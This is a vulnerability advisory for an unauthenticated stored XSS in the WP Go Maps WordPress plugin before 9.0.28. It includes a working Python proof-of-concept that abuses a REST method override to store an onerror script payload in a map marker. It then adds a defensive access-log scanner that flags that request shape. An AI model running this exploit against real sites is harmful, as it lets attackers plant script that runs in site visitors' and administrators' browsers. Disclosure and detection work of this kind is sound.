wpexploit | Marc Montpas | WPEX-ID:F5687D0E-98CA-4449-98D6-7170C97C8F54
Dec 12, 2023 - 12:00 a.m.

WP Go Maps < 9.0.28 - Unauthenticated Stored XSS

AI Score: 6.7 Medium (Confidence: Low)

EPSS: 0.0005 Low (Percentile: 17.1%)

Description: The plugin does not properly protect most of its REST API routes, which attackers can abuse to store malicious HTML/JavaScript on the site.

Run the following Python script, then visit https://vulnerable-site.tld/wp-admin/admin.php?page=wp-google-maps-menu&action=edit&map_id=1.

Alternatively, visit the page where the map is displayed after the fact and click on the affected marker to trigger the XSS.

```python
import sys
import requests

if len(sys.argv) != 2:
    print(f'{sys.argv[0]} <target_site_root_url>')
    sys.exit()

url = sys.argv[1].rstrip('/')

# Get list of existing markers
res = requests.get(f'{url}/wp-json/wpgmza/v1/markers').json()

if len(res) == 0:
    print('# No markers found! Make sure the plugin is properly setup.')
    sys.exit()

marker_id = res[0]['id']
print(f'# Found marker ID #{marker_id}, using it to demonstrate the exploit')

print('# Tricking the POST section of the endpoint to store our XSS payload..')
body = {
    'address': '<img src="x" onerror=alert("xss")//">'
}
requests.post(f'{url}/wp-json/wpgmzA/v1/markers?_method=get&random=/wpgmza/v1/markers/{marker_id}', data=body)
```
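
For triage on a site that ran a version older than 9.0.28, the request shape used by the script above can be searched for in web server access logs. The following is an added example, not part of the original advisory or of the plugin: it assumes Apache/nginx "combined" log format, and the function names, reason strings and sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Leading fields of an Apache/nginx "combined" access-log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
REST_BASE = '/wp-json/wpgmza/'   # plugin REST namespace as it appears in the script above
ROUTE_HINT = '/wpgmza/v1/'       # route text the script places inside a query value

def classify(line):
    """Return the reasons a log line matches the request shape above ([] if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m['target'])
    path = unquote(parts.path)
    if REST_BASE not in path.lower():
        return []
    query = parse_qs(parts.query, keep_blank_values=True)
    reasons = []
    overrides = [v.lower() for k, vs in query.items() if k.lower() == '_method' for v in vs]
    if m['method'] == 'POST' and 'get' in overrides:
        reasons.append('POST carrying _method=get')
    if REST_BASE not in path:
        reasons.append('mixed-case namespace in path')
    if any(ROUTE_HINT in v.lower() for vs in query.values() for v in vs):
        reasons.append('REST route inside a query value')
    return reasons

def scan(lines):
    """Return (client_ip, timestamp, reasons) for every flagged line."""
    hits = []
    for line in lines:
        reasons = classify(line)
        if reasons:
            m = LOG_RE.match(line)
            hits.append((m['ip'], m['ts'], reasons))
    return hits

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE = [
    '198.51.100.7 - - [12/Dec/2023:10:00:01 +0000] "GET /wp-json/wpgmza/v1/markers HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Dec/2023:10:00:05 +0000] "POST /wp-json/wpgmzA/v1/markers?_method=get&random=/wpgmza/v1/markers/1 HTTP/1.1" 200 64 "-" "python-requests/2.31.0"',
    '198.51.100.7 - - [12/Dec/2023:10:00:09 +0000] "POST /wp-json/wp/v2/comments HTTP/1.1" 201 300 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for ip, ts, reasons in scan(SAMPLE):
        print(ip, ts, '; '.join(reasons))
```

A hit only shows that a request of this shape reached the server; marker fields such as `address` still need to be reviewed for stored HTML, and the three heuristics should be checked against the site's normal traffic before alerting on them.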
